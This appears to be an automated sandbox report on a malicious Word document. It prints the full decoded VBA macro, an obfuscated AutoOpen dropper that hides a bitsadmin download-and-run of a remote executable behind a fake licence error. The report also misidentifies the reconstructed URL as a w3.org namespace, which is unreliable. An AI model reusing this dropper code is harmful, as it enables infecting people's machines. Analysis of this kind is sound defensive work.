MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen subroutine, which is a common technique for malicious documents. The document body explicitly instructs the user to 'Enable editing' and 'Enable Content', indicating a lure to bypass security measures. The VBA script attempts to execute a command via the Shell function, likely to download and run a second-stage payload. The reconstructed URL from the obfuscated VBA code is 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6457794-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6457794-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If Shell Jldzjklepor, vbHide MsgBox Wglwnewek -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "NewMacros" Sub AutoOpen() Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("fpg1h{h 2f %") & Vkjicixsoxwcend("zdlwiru 2w 8") & Vkjicixsoxwcend(" \NHUT ) elwvdgplq ") & Vkjicixsoxwcend("2wudqvihu XNHI 2grzqordg 2su") & Vkjicixsoxwcend("lrulw| qrupdo kw") & Vkjicixsoxwcend("wsv=22zzz1gurser{1frp") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2608 bytes |
SHA-256: 24500ed0607ba5c49a116f1c0d4a3f33b23b3f5b76b0ddb15e90b3c3af607079 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
29 of 57 identifiers look randomly generated (e.g. 'Llkkeclduklrinoykdkcptbam') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("fpg1h{h 2f %") & Vkjicixsoxwcend("zdlwiru 2w 8") & Vkjicixsoxwcend(" \NHUT ) elwvdgplq ") & Vkjicixsoxwcend("2wudqvihu XNHI 2grzqordg 2su") & Vkjicixsoxwcend("lrulw| qrupdo kw") & Vkjicixsoxwcend("wsv=22zzz1gurser{1frp")
Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("2v2os<4sw53{g:g") & Vkjicixsoxwcend(";7l25") & Vkjicixsoxwcend("de|q|e|tnxdut") & Vkjicixsoxwcend("rfd{rwr1h{hBg") & Vkjicixsoxwcend("o@4 (dssgdwd(_gs|jks1") & Vkjicixsoxwcend("h{h )") & Vkjicixsoxwcend("vwduw (dssgdwd(_gs|jk")
Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("s1h{h%")
If 59 * 4 = 12255 - 4685 Then
ghblzmzr = "bbmhy"
End If
Wglwnewek = Wglwnewek & Vkjicixsoxwcend("Huuru 4<;:7= \rx pxvw kdyh Rii") & Vkjicixsoxwcend("lfh Surihvvlrqdo Hglwlrq wr uh") & Vkjicixsoxwcend("dg wklv frqwhqw/ so") & Vkjicixsoxwcend("hdvh x") & Vkjicixsoxwcend("sjudgh |rxu olfhq") & Vkjicixsoxwcend("fh1 Ylvlw zzz") & Vkjicixsoxwcend("1plfurvriw1frp iru khos")
If Len("ovihyb") <> 167 Then
' fsvnmbgk
Else
' gmzwgfw
MsgBox "kzcknp", 282, "rkjrbpg"
End If
Shell Jldzjklepor, vbHide
MsgBox Wglwnewek
End Sub
Private Function Llkkeclduklrinoykdkcptbam(ByVal Psissennatzjccbrbmsknp As String, ByVal Bokgpt As Long) As String
If 514 * 3 = 23858 - 4050 Then
skabawcw = "xdmdktk"
End If
Dim Jhbt, Bwjhepgihtrih, Hrtkfowrgekhrkjaujtcl As Long
Jhbt = Len(Psissennatzjccbrbmsknp)
Dim Lcgjkujlju As String
Dim Egaskikszbp() As Long
ReDim Egaskikszbp(1 To Jhbt)
For Hrtkfowrgekhrkjaujtcl = 1 To Jhbt
If 654 * 8 = 24846 - 1453 Then
bwdcljj = "maclgdev"
End If
Bwjhepgihtrih = Asc(Mid(Psissennatzjccbrbmsknp, Hrtkfowrgekhrkjaujtcl, 1))
If Bwjhepgihtrih = 32 Then
Egaskikszbp(Hrtkfowrgekhrkjaujtcl) = Bwjhepgihtrih
Else:
If 335 * 3 = 26990 - 3133 Then
ffuozel = "srosep"
End If
Bwjhepgihtrih = Bwjhepgihtrih - Bokgpt
Egaskikszbp(Hrtkfowrgekhrkjaujtcl) = Bwjhepgihtrih
End If
If Len("yzykr") <> 295 Then
' abykmfx
Else
' tsyhh
MsgBox "ibkukpt", 395, "updmdgaw"
End If
Lcgjkujlju = Lcgjkujlju & Chr(Egaskikszbp(Hrtkfowrgekhrkjaujtcl))
Next
Llkkeclduklrinoykdkcptbam = Lcgjkujlju
End Function
Private Function Vkjicixsoxwcend(Oybkwjmskntyzkr As String)
Vkjicixsoxwcend = Llkkeclduklrinoykdkcptbam(Oybkwjmskntyzkr, 3)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.